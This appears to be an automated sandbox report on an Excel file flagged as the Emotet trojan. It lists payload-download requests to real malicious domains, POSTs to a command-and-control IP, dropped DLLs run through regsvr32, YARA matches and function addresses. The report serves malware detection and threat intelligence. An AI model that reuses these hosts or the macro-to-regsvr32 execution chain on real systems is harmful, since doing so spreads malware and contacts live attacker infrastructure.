Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

HTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 284Host: 182.162.143.56

Source: unknown

DNS traffic detected: queries for: datie-tw.com

Source: global traffic	HTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown

Office process drops PE file

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx	Jump to dropped file

Source: PO0000001552.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\system32\XEzXl\

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07DBCC	8_2_00007FFD2B07DBCC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07C420	8_2_00007FFD2B07C420
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B06EAB8	8_2_00007FFD2B06EAB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B06732C	8_2_00007FFD2B06732C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B0719D4	8_2_00007FFD2B0719D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07C0E8	8_2_00007FFD2B07C0E8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07D118	8_2_00007FFD2B07D118
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B06EFA4	8_2_00007FFD2B06EFA4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B07C7C0	8_2_00007FFD2B07C7C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B06D720	8_2_00007FFD2B06D720
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B074574	8_2_00007FFD2B074574
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B065D68	8_2_00007FFD2B065D68
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B0715B0	8_2_00007FFD2B0715B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B073CE8	8_2_00007FFD2B073CE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_009B0000	8_2_009B0000
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180001864	8_2_0000000180001864
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180008470	8_2_0000000180008470
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800274F4	8_2_00000001800274F4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180012108	8_2_0000000180012108
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180027AE4	8_2_0000000180027AE4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180007F20	8_2_0000000180007F20
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180019F38	8_2_0000000180019F38
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000EB3C	8_2_000000018000EB3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000FBB4	8_2_000000018000FBB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180001FE8	8_2_0000000180001FE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800197F8	8_2_00000001800197F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180012BFC	8_2_0000000180012BFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001EBFC	8_2_000000018001EBFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180008BFC	8_2_0000000180008BFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003800	8_2_0000000180003800
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180007014	8_2_0000000180007014
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015020	8_2_0000000180015020
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002A43C	8_2_000000018002A43C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000E850	8_2_000000018000E850
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180002C5C	8_2_0000000180002C5C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180013468	8_2_0000000180013468
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001A470	8_2_000000018001A470
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180016C70	8_2_0000000180016C70
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180014C80	8_2_0000000180014C80
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000B888	8_2_000000018000B888
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180011C90	8_2_0000000180011C90
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180021894	8_2_0000000180021894
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180021094	8_2_0000000180021094
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180026098	8_2_0000000180026098
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180005498	8_2_0000000180005498
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180017CB0	8_2_0000000180017CB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180025CB8	8_2_0000000180025CB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000CCB8	8_2_000000018000CCB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800094BC	8_2_00000001800094BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800180C8	8_2_00000001800180C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001B4CC	8_2_000000018001B4CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800278D8	8_2_00000001800278D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003CD8	8_2_0000000180003CD8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001E8E4	8_2_000000018001E8E4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800258E8	8_2_00000001800258E8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800138F0	8_2_00000001800138F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180002504	8_2_0000000180002504
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001C108	8_2_000000018001C108
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000E50C	8_2_000000018000E50C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180014514	8_2_0000000180014514
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180026518	8_2_0000000180026518
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015120	8_2_0000000180015120
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015524	8_2_0000000180015524
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180007130	8_2_0000000180007130
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180008D40	8_2_0000000180008D40
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002C144	8_2_000000018002C144
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000795C	8_2_000000018000795C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180001560	8_2_0000000180001560
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001C57C	8_2_000000018001C57C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000E97C	8_2_000000018000E97C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003990	8_2_0000000180003990
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800099A0	8_2_00000001800099A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800299A4	8_2_00000001800299A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000B9B4	8_2_000000018000B9B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180013DBC	8_2_0000000180013DBC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001FDC0	8_2_000000018001FDC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800131C8	8_2_00000001800131C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000D1CC	8_2_000000018000D1CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800029CC	8_2_00000001800029CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000B5CC	8_2_000000018000B5CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800245D0	8_2_00000001800245D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180014DD0	8_2_0000000180014DD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800191E0	8_2_00000001800191E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000FDE4	8_2_000000018000FDE4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001A9F0	8_2_000000018001A9F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800055F4	8_2_00000001800055F4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180019E08	8_2_0000000180019E08
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000320C	8_2_000000018000320C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180011A19	8_2_0000000180011A19
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001F624	8_2_000000018001F624
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003E2C	8_2_0000000180003E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180013634	8_2_0000000180013634
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001BA34	8_2_000000018001BA34
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002BA3C	8_2_000000018002BA3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015240	8_2_0000000180015240
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180017A40	8_2_0000000180017A40
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180007658	8_2_0000000180007658
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000C65C	8_2_000000018000C65C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000FA60	8_2_000000018000FA60
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180025668	8_2_0000000180025668
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180006668	8_2_0000000180006668
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180008E68	8_2_0000000180008E68
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001B670	8_2_000000018001B670
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001BE70	8_2_000000018001BE70
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000A678	8_2_000000018000A678
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001A27C	8_2_000000018001A27C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180025280	8_2_0000000180025280
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180005684	8_2_0000000180005684
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000CE88	8_2_000000018000CE88
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180021E8C	8_2_0000000180021E8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002228C	8_2_000000018002228C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001428C	8_2_000000018001428C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180018698	8_2_0000000180018698
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180023E9C	8_2_0000000180023E9C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800016A0	8_2_00000001800016A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800072A4	8_2_00000001800072A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000D6A4	8_2_000000018000D6A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002B6AC	8_2_000000018002B6AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800026B0	8_2_00000001800026B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000CAB4	8_2_000000018000CAB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000BAD0	8_2_000000018000BAD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001EEE0	8_2_000000018001EEE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180025B0C	8_2_0000000180025B0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180021B10	8_2_0000000180021B10
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003310	8_2_0000000180003310
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000E310	8_2_000000018000E310
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180027F1C	8_2_0000000180027F1C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001FF28	8_2_000000018001FF28
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180011F30	8_2_0000000180011F30
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180010330	8_2_0000000180010330
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000C334	8_2_000000018000C334
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180015344	8_2_0000000180015344
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180003F54	8_2_0000000180003F54
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180006B54	8_2_0000000180006B54
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180029F58	8_2_0000000180029F58
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001A764	8_2_000000018001A764
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180013B6C	8_2_0000000180013B6C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001337C	8_2_000000018001337C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180009B84	8_2_0000000180009B84
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180024788	8_2_0000000180024788
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001F388	8_2_000000018001F388
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180019B88	8_2_0000000180019B88
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000C788	8_2_000000018000C788
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001238C	8_2_000000018001238C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180023B90	8_2_0000000180023B90
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018001BB98	8_2_000000018001BB98
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018002B39C	8_2_000000018002B39C
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000B3A4	8_2_000000018000B3A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180010BAE	8_2_0000000180010BAE
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800293B4	8_2_00000001800293B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800167C4	8_2_00000001800167C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000AFD4	8_2_000000018000AFD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000BBD4	8_2_000000018000BBD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800137DC	8_2_00000001800137DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000ABDC	8_2_000000018000ABDC

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: PO0000001552.xls

Virustotal: Detection: 66%

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: PO0000001552.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\PO0000001552.xls

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{8FCFB94A-FCE6-4E34-A02C-69E8EC3E944A} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@11/15@4/59

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B0638E8 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,ShowWindow,UpdateWindow,

8_2_00007FFD2B0638E8

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: PO0000001552.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00000001800274F4 FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,

8_2_00000001800274F4

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: PO0000001552.xls

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180005098 push ebp; ret	8_2_0000000180005099
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800118AD push esp; retn 0000h	8_2_00000001800118B5
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800170C8 push eax; retf	8_2_00000001800170C9
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800170DD push ecx; iretd	8_2_00000001800170E2
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_000000018000512B push ebp; retf	8_2_000000018000512F
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180004938 push eax; ret	8_2_000000018000493B
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800171F0 push eax; retf	8_2_00000001800171F1
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0000000180010F42 push 8B48E1F7h; retf	8_2_0000000180010F51
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00000001800117D6 pushad ; ret	8_2_00000001800117D8

Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr	Static PE information: section name: text
Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.dr	Static PE information: section name: text
Source: elv2.ooocccxxx.0.dr	Static PE information: section name: text
Source: elv3.ooocccxxx.0.dr	Static PE information: section name: text

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B072AF0 DecodePointer,_errno,_invalid_parameter_noinfo,LoadLibraryW,GetProcAddress,_errno,GetLastError,_invalid_parameter_noinfo,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,

8_2_00007FFD2B072AF0

Source: elv2.ooocccxxx.0.dr	Static PE information: real checksum: 0x6e4a7 should be: 0x7446f
Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr	Static PE information: real checksum: 0x6e4a7 should be: 0x7446f
Source: elv3.ooocccxxx.0.dr	Static PE information: real checksum: 0x6e4a7 should be: 0x72327
Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.dr	Static PE information: real checksum: 0x6e4a7 should be: 0x72327

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv2.ooocccxxx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	File created: C:\Users\user\elv3.ooocccxxx			Jump to dropped file

